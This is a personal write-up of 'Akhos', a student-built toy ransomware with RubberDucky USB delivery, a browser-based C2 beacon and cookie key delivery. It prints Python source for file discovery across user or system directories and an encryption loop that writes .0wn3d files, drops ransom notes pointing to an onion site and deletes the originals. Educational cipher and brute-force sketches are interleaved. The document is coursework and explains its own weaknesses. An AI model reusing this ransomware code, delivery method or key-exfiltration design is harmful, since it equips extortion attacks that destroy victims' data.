Akhos Ransomware

Akhos is the name given to a toy ransomware that I built for a Cyber Security module during my undergraduate degree. The word comes from the ancient Greek ἄχος and means to be upset or afraid, which is what most people feel when they are dealing with this sort of malware.

Akhos comprises three parts: a Python program, compiled into an executable, that finds and encrypts the files; a Ruby application running Sinatra, backed by PostgreSQL, that provides the web-based Command and Control; and a RubberDucky that provides the delivery mechanism.

STAGE 1: DELIVERY

A RubberDucky is used to deliver the payload to the target organisation. For those unaware, a RubberDucky is a small device that looks like a USB flash drive but acts like a USB keyboard. It exploits the trust relationship that modern systems have with peripheral devices plugged in via USB. Using a special language called DuckyScript, the developer can send a sequence of keystrokes to the computer when the device is plugged in, allowing them to execute arbitrary commands. The device can reach an employee at the target company in many ways: dead drops, mail, free hand-outs at conferences, being plugged in during office tours, etc.

This choice was inspired by a talk on social engineering given at a conference at UKFast, Manchester, in 2014 by a well-renowned security professional, Andy Hague. During the talk he outlined an experiment in which he sent USB flash drives, each packaged in a golden box, to the Chief Financial Officer (CFO) of 500 different companies. He sent these out on a Friday evening so that they would be waiting on each CFO's desk when they arrived at work the following Monday morning. Inside the golden box was an elegantly written note inviting the CFO to a company event and asking them to respond via the USB drive provided. When the drive was inserted into a computer, a full-screen picture appeared with a message informing the CFO of the experiment. Behind the scenes, the drive pinged his server so that he could count how many of the devices had been plugged in. By noon that Monday, over 350 of the 500 drives had pinged his server: a success rate of more than 70% within three hours of the working week beginning.

STAGE 2: DEPLOYMENT

When the RubberDucky is plugged in, the embedded firmware will automatically run a script located on the inserted microSD card, and that script is configured by the attacker to run whatever commands they need to fulfil their objectives. In this case, a binary called RSVP.exe is executed. Let's have a look at what happens when it is run:

After initial setup of logging and configuration variables, two threads are spawned to run concurrently. The first of these is the DirectoryThread. The sole purpose of this thread is to walk the filesystem and gather a list of files to encrypt.


      from threading import Thread
      import os
      from queue import Queue
      from pathlib import Path
      from re import match


      class DirectoryThread(Thread):
          '''
          This thread is responsible for locating and building a list of files that are going to
          be encrypted. It recursively traverses the folders and returns a list via the queue.
          '''

          def __init__(self, queue: Queue, admin: bool = False):
              Thread.__init__(self)
              self.queue = queue
              # The whitelist has been hardcoded for simplicity, but in reality the patterns are
              # stored in a YAML file and loaded during startup.
              self.whitelist = ['.*.akhos_target']
              self.admin = admin

          def run(self):
              files = self.collect_filelist()
              self.queue.put(files)

          #abstractmethod
          def collect_filelist(self):
              raise NotImplementedError

          @staticmethod
          def directory_thread_from_os(os: str, queue: Queue, admin: bool = False):
              if os == 'linux':
                  return LinuxDirectoryThread(queue, admin)
              if os == 'windows':
                  return WindowsDirectoryThread(queue, admin)


      class LinuxDirectoryThread(DirectoryThread):
          #override
          def collect_filelist(self):
              directory_array = []
              root = '/' if self.admin else '/home/'
              for dirname, dirnames, filenames in os.walk(root):
                  for filename in filenames:
                      for pattern in self.whitelist:
                          if match(pattern, Path(filename).suffix):
                              directory_array.append(Path(dirname, filename))
              return directory_array


      class WindowsDirectoryThread(DirectoryThread):
          #override
          def collect_filelist(self):
              directory_array = []
              root = 'C:/' if self.admin else 'C:/Users/'
              for dirname, dirnames, filenames in os.walk(root):
                  for filename in filenames:
                      for pattern in self.whitelist:
                          if match(pattern, Path(filename).suffix):
                              directory_array.append(Path(dirname, filename))
              return directory_array

At the same time, another thread called BrowserThread is spawned. The purpose of this thread is to determine the name of the browser that is installed and open a page at the Command and Control URL (for example): https://command_and_control.akhos.server. It gathers some system information to create an MD5 hash that can be used to uniquely identify the system, then appends the hash to the URL as the target path:
https://command_and_control.akhos.server/1a79a4d60de6718e8e5b326e338ae533


      import webbrowser
      from threading import Thread
      from hashlib import md5
      from getpass import getuser
      from platform import platform
      from socket import gethostname
      from time import time_ns
      from queue import Queue


      class BrowserThread(Thread):
          '''
          This thread is responsible for determining the initial connection to the C&C server. It first
          creates an MD5 hexdigest of some system information to pass on. Second it needs to open a
          webpage and pass on which application opened it.
          '''

          def __init__(self, queue: Queue, cc_url: str):
              Thread.__init__(self)
              self.queue = queue
              self.cc_url = cc_url

          def run(self) -> bool:
              uid = self.generate_uid()
              browser = self.find_usable_browser()
              if not browser:
                  return False

              browser.open_new_tab(f'{self.cc_url}/{uid}')
              browser_name = self.normalise_browser_name(self.get_browser_name(browser))
              if not browser_name:
                  return False

              self.queue.put(browser_name)
              return True

          def generate_uid(self) -> str:
              info = platform() + gethostname() + getuser() + str(time_ns())
              return md5(info.encode('utf-8')).hexdigest()

          def find_usable_browser(self):
              for browser in self.browser_list():
                  try:
                      return webbrowser.get(browser)
                  except webbrowser.Error:
                      continue
              return None

          #abstractmethod
          def browser_list(self) -> list:
              raise NotImplementedError

          #abstractmethod
          def get_browser_name(self, browser) -> str:
              raise NotImplementedError

          def normalise_browser_name(self, browser_name: str) -> str:
              if browser_name in ['google-chrome', 'chrome', 'chromium', 'chromium-browser']:
                  return 'chrome'
              elif browser_name in ['mozilla', 'firefox']:
                  return 'firefox'
              else:
                  return None

          @staticmethod
          def browser_thread_from_os(os, queue, cc_url):
              if os == 'linux':
                  return LinuxBrowserThread(queue, cc_url)
              if os == 'windows':
                  return WindowsBrowserThread(queue, cc_url)


      class LinuxBrowserThread(BrowserThread):
          def __init__(self, queue, cc_url):
              super().__init__(queue, cc_url)

          #override
          def browser_list(self) -> list:
              return ['firefox', 'google-chrome', 'chromium']

          #override
          def get_browser_name(self, browser):
              return browser.basename


      class WindowsBrowserThread(BrowserThread):
          '''
          Windows-specific searching. The 'webbrowser' module has a browser type of 'windows-default',
          which is likely to be chosen. It doesn't have the `basename` attribute, so the registry needs
          to be queried to find out which browser is set to default if this option is chosen.
          '''

          def __init__(self, queue, cc_url):
              super().__init__(queue, cc_url)

          #override
          def browser_list(self) -> list:
              return ['firefox', 'mozilla', 'google-chrome', 'chrome', 'windows-default']

          #override
          def get_browser_name(self, browser) -> str:
              if type(browser) == webbrowser.WindowsDefault:
                  from winreg import OpenKey, QueryValueEx, HKEY_CURRENT_USER
                  from re import search

                  def get_browser_name_from_registry_key(reg_path: str) -> str:
                      with OpenKey(HKEY_CURRENT_USER, reg_path) as key:
                          default = QueryValueEx(key, 'ProgId')[0].lower()
                          for element in self.browser_list():
                              if search(element, default):
                                  return element
                      return None

                  path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice'
                  browser_name = get_browser_name_from_registry_key(path)
                  if browser_name:
                      return browser_name

                  path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice'
                  browser_name = get_browser_name_from_registry_key(path)
                  return browser_name
              else:
                  return browser.basename

The page displayed to the user when the browser opens contains a form that resembles the one in the image to the bottom left. It is designed to keep the user distracted while the ransomware encrypts the files, and the form resets after a delay once "Submit" is clicked. The page's other purpose is to deliver the encryption key to the system, which is done via an HTTP cookie. An example of this is shown on the bottom right. As you can see, the key is stored in the cookie's 'name' field. This is because cookie values are usually encrypted by the browser, but the name is not. The cookie also has a max age so that it is deleted once it expires.

Once the browser thread has returned the name of the browser and sent the user to the RSVP form, the next stage is to poll the browser cookie cache for the key. This is done in an object aptly named CookieRetriever.

STAGE 3: INFECTION

With the key retrieved from the cookie, it must be split into its three components. This is because Akhos uses a "product cipher" for encryption. A product cipher is simply a pipeline of algorithms, where the output of one is the input to the next. Modern ciphers, such as the Advanced Encryption Standard (AES), use this approach. The following diagram depicts the flow that Akhos uses:

The three ciphers chosen for this are the Affine, transposition, and Vigenère ciphers. Each has its own restrictions on the format of its key, so three keys are needed. These are all symmetric ciphers, so the key used to encrypt a message is also used to decrypt the ciphertext. To encrypt a plaintext message P with this product cipher:
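As an illustration of what a key restriction looks like, here is a minimal sketch for the Affine cipher. It assumes a 26-letter alphabet, which the write-up does not specify, and the helper names `valid_affine_multipliers` and `affine_map` are hypothetical. The multiplier `a` must be coprime with the alphabet size, otherwise two plaintext letters map to the same ciphertext letter and decryption becomes ambiguous.

```python
from math import gcd

M = 26  # assumed alphabet size (A-Z); not stated in the original write-up


def valid_affine_multipliers(m: int = M) -> list:
    """Return every multiplier a for which x -> (a*x + b) mod m is invertible."""
    return [a for a in range(1, m) if gcd(a, m) == 1]


def affine_map(a: int, b: int, m: int = M) -> list:
    """Return the image of every letter index under x -> (a*x + b) mod m."""
    return [(a * x + b) % m for x in range(m)]


multipliers = valid_affine_multipliers()

# 5 is coprime with 26, so all 26 outputs are distinct.
collision_free = len(set(affine_map(5, 8))) == M

# 2 shares a factor with 26, so some letters collide and cannot be decrypted.
collides = len(set(affine_map(2, 8))) < M
```

The other two ciphers have looser constraints: a transposition key is typically a permutation of column indices, and a Vigenère key is a word drawn from the same alphabet as the message.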

P is substituted using the Affine cipher to generate the ciphertext C1. C1 is permuted using the transposition cipher to generate C2. C2 is then substituted using the Vigenère cipher to produce the final ciphertext C3.
C3 = E3(E2(E1(P, Ka, Kb), K2), K3)
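The pipeline above can be sketched with textbook versions of the three ciphers. This is not the Akhos `encryptor` itself, whose source is not shown here. It is a minimal sketch that assumes uppercase A-Z input, a columnar transposition keyed by a permutation of column indices, and hypothetical function names throughout. Decryption simply applies the inverse of each stage in reverse order.

```python
from math import gcd
from string import ascii_uppercase as ALPHABET

M = len(ALPHABET)  # 26; assumes messages contain only A-Z


def affine_encrypt(text: str, a: int, b: int) -> str:
    if gcd(a, M) != 1:
        raise ValueError('a must be coprime with the alphabet size')
    return ''.join(ALPHABET[(a * ALPHABET.index(ch) + b) % M] for ch in text)


def affine_decrypt(text: str, a: int, b: int) -> str:
    a_inv = pow(a, -1, M)  # modular inverse (Python 3.8+)
    return ''.join(ALPHABET[(a_inv * (ALPHABET.index(ch) - b)) % M] for ch in text)


def transposition_encrypt(text: str, key: tuple) -> str:
    # Write the text row by row into len(key) columns, then read the
    # columns out in the order given by the key.
    n = len(key)
    return ''.join(text[col::n] for col in key)


def transposition_decrypt(text: str, key: tuple) -> str:
    n = len(key)
    plain = [''] * len(text)
    pos = 0
    for col in key:
        size = len(range(col, len(text), n))  # number of letters in this column
        plain[col::n] = list(text[pos:pos + size])
        pos += size
    return ''.join(plain)


def vigenere(text: str, key: str, sign: int = 1) -> str:
    # sign=1 encrypts, sign=-1 decrypts.
    return ''.join(
        ALPHABET[(ALPHABET.index(ch) + sign * ALPHABET.index(key[i % len(key)])) % M]
        for i, ch in enumerate(text)
    )


def product_encrypt(p: str, ka: int, kb: int, k2: tuple, k3: str) -> str:
    c1 = affine_encrypt(p, ka, kb)          # E1
    c2 = transposition_encrypt(c1, k2)      # E2
    return vigenere(c2, k3)                 # E3


def product_decrypt(c3: str, ka: int, kb: int, k2: tuple, k3: str) -> str:
    c2 = vigenere(c3, k3, sign=-1)
    c1 = transposition_decrypt(c2, k2)
    return affine_decrypt(c1, ka, kb)


plaintext = 'ATTACKATDAWN'
keys = (5, 8, (2, 0, 1), 'KEY')  # illustrative values for Ka, Kb, K2, K3
ciphertext = product_encrypt(plaintext, *keys)
recovered = product_decrypt(ciphertext, *keys)
```

With these example keys, `recovered` equals `plaintext`, which confirms that the three stages invert cleanly when undone in the opposite order.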

At this point in the execution, the directory thread should have returned with the list of files to encrypt. Now the main loop can run, passing each file into the product cipher and writing the output to a new file.


      # Prior to this is the collection of the encryption key.

      # Ensure directory list is finished, then retrieve list from the queue.
      directory_thread.join()
      file_list = queue.get()

      # A new file will be created every 10th file.
      counter = 0
      for file_path in file_list:
          # Open file and encrypt contents.
          original_file_path = Path(file_path)
          ciphertext = encryptor.encrypt(keys, original_file_path.read_text())

          # Hash file name and append file extension.
          hashed_file_name = md5(original_file_path.name.encode('utf-8')).hexdigest() + '.0wn3d'

          # Write encrypted text to file.
          out_file_path = Path(original_file_path.parent, hashed_file_name)
          out_file_path.write_text(ciphertext)

          # Every 10 files create new random file.
          counter += 1
          if counter % 10 == 0:
              random_file_path = Path(f'{md5(str(counter).encode("utf-8")).hexdigest()}.0wn3d')
              random_file_path.write_bytes(urandom(4096))

          # Add payment instruction file to each directory.
          ransom_file_path = Path(original_file_path.parent, 'ransom.txt')
          if not ransom_file_path.exists():
              ransom_file_path.write_text(ransome_text)

          # Delete old file.
          remove(original_file_path)

A new file of random data is created for every 10 files encrypted. This adds a level of obfuscation to make reverse engineering efforts a little more challenging. A standard ransom note is added to each directory with a link to an onion site, payment instructions, and a warning regarding missed payment.

Altogether, this makes a complete ransomware variant, although it has several obvious weaknesses. First and foremost is the use of weak and broken ciphers. In a real-world scenario, there would be no need to use anything other than AES or an equally powerful alternative, but this project was a lesson in cryptography as well as ransomware. The second, and equally obvious, flaw is that the shadow copies created by the Volume Shadow Copy Service (VSS) were not deleted. VSS is a Windows backup technology that could be used to restore the encrypted files.
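To give a sense of how weak these ciphers are, the sketch below recovers an Affine key by exhaustive search. It assumes a 26-letter alphabet and that the analyst knows a short fragment of the plaintext (a "crib"), and all function names are hypothetical. It covers only the Affine layer in isolation. Peeling apart the full three-stage product takes more work, but each layer falls to similarly classical techniques.

```python
from math import gcd
from string import ascii_uppercase as ALPHABET

M = len(ALPHABET)  # 26; assumed alphabet size


def affine_encrypt(text: str, a: int, b: int) -> str:
    return ''.join(ALPHABET[(a * ALPHABET.index(ch) + b) % M] for ch in text)


def affine_decrypt(text: str, a: int, b: int) -> str:
    a_inv = pow(a, -1, M)  # modular inverse (Python 3.8+)
    return ''.join(ALPHABET[(a_inv * (ALPHABET.index(ch) - b)) % M] for ch in text)


def all_affine_keys() -> list:
    """Enumerate every valid (a, b) pair: 12 multipliers times 26 shifts."""
    return [(a, b) for a in range(1, M) if gcd(a, M) == 1 for b in range(M)]


def brute_force(ciphertext: str, crib: str) -> list:
    """Return every key whose trial decryption contains the known fragment."""
    return [(a, b) for a, b in all_affine_keys()
            if crib in affine_decrypt(ciphertext, a, b)]


secret = affine_encrypt('ATTACKATDAWN', 5, 8)
candidates = brute_force(secret, 'ATTACK')
key_space = len(all_affine_keys())
```

The whole key space is only 312 pairs, so the search finishes instantly, whereas AES-128 has 2^128 possible keys.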